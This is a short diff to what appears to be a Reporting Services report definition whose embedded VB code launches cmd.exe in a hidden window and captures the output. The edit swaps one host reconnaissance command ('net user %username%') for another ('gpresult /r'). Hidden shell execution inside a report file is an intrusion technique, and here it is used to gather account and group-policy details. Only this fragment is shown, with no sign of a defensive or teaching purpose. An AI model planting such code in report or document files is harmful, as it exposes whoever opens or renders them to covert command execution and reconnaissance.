--- a/untitled.rdl
+++ b/untitled.rdl
@@ -49,7 +49,7 @@
       Try
         Dim p As New System.Diagnostics.Process()
         p.StartInfo.FileName = "cmd.exe"
-        p.StartInfo.Arguments = "/c net user %username%"
+        p.StartInfo.Arguments = "/c gpresult /r"
         p.StartInfo.RedirectStandardOutput = True
         p.StartInfo.UseShellExecute = False
         p.StartInfo.CreateNoWindow = True
